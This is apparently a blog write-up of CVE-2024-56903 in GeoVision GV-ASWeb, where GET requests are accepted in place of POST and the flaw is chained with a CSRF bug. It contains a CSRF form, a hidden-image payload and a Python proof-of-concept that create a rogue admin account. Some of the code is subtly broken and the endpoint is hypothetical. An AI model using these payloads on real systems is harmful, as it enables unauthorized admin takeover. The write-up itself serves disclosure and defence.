CVE-2024-56903 - How a Simple HTTP Trick Breaks Security in GeoVision GV-ASWeb (<=6.1.1.)

---

Introduction

In the world of security, sometimes the biggest problems come from the smallest details. That’s exactly the case with CVE-2024-56903 – a newly discovered vulnerability in GeoVision GV-ASWeb before version 6.1.1.. This post walks you through how this bug lets attackers twist POST requests into GET requests and why that opens dangerous doors, especially when combined with CVE-2024-56901 for a Cross-Site Request Forgery (CSRF) attack. We'll break it down with clear examples, code snippets, and steps for those who want to understand or test it themselves.

Product: GeoVision GV-ASWeb (<=6.1.1.)

- CVE: CVE-2024-56903

Type: HTTP Method Manipulation (POST → GET) leading to *Unauthenticated Sensitive Actions*

- Chain: Often used with CVE-2024-56901 (CSRF)
- Impact: Anyone can trigger critical account actions by simply changing the request method, bypassing normal protections.

What’s the Bug?

Normally, important actions like changing a password or deleting an account are done through POST requests. Browsers and security features know to watch these closely, especially for things like CSRF.

But GV-ASWeb doesn’t actually check that the request is a POST. It just looks for the URL path (*endpoint*), and as long as the right parameters are there, it performs the operation—even if it comes from a GET request.

Why does this matter? Browsers block CSRF attacks on POST requests more effectively, but GETs are much easier to trigger from an attacker. Forms, malicious links, or even images can trick users into firing off unwanted GET requests.

Here's how an attacker abuses this flaw

1. Attacker crafts a malicious URL that performs a sensitive operation (like creating or deleting a user).
2. The victim, who is logged into GV-ASWeb as an admin, clicks the link (or visits a page where the URL is requested in the background).

Because GV-ASWeb doesn’t care if it’s POST or GET, the operation happens right away.

Chained with CVE-2024-56901: Since CSRF protections usually guard against POSTs, switching to GET sidesteps those protections altogether.

Code Sample: Exploit in Action

Let’s say GV-ASWeb’s admin user addition is supposed to happen only via POST to /admin/add_user.

Normally, a CSRF attack would look like this (which *should* be blocked for being a cross-origin POST):

<!-- The attacker tries to make the victim's browser send a POST request -->
<form action="http://target-gvasweb/admin/add_user"; method="POST">
  <input type="hidden" name="username" value="eviladmin">
  <input type="hidden" name="password" value="P@sswrd!">
  <input type="submit" value="Submit">
</form>
<script>document.forms[].submit();</script>

But with CVE-2024-56903, the attacker simply switches to GET

<!-- GET request does the same thing thanks to the bug -->
<img src="http://target-gvasweb/admin/add_user?username=eviladmin&password=P@sswrd!"; style="display:none;">

The victim loads the image (invisible on the page), but that GET request is enough for GV-ASWeb <=6.1.1. to create the new admin account!

Proof of Concept (PoC)

Here's a *Python* script using requests to demonstrate the vulnerability.

import requests

url = "http://target-gvasweb/admin/add_user";
params = {
    'username': 'eviladmin',
    'password': 'P@sswrd!'
}
# No authentication required if a valid session is active in the victim's browser
# Send GET instead of POST
r = requests.get(url, params=params)
print('Status:', r.status_code)
print('Response:', r.text)

Fix: Update GV-ASWeb to the latest version.

- Mitigation: Until you can update, restrict access to GV-ASWeb from untrusted networks. Remove or tightly control admin account access.

References

- NVD Entry for CVE-2024-56903
- NVD Entry for CVE-2024-56901 (CSRF)
- GeoVision Security Center
- Detailed technical analysis - packetstormsecurity.com

Conclusion

CVE-2024-56903 is a perfect example of how simple coding oversights can lead to big security problems. By failing to check HTTP methods, GV-ASWeb made it possible for attackers to automate changes to the system with nothing more than a web link or image.

Stay safe: keep your systems updated and always treat web endpoints with respect for proper HTTP methods!


*If you found this writeup helpful, share it to raise awareness! Got questions or updates? Drop a comment below.*

Timeline

Published on: 02/03/2025 21:15:14 UTC
Last modified on: 03/04/2025 22:15:39 UTC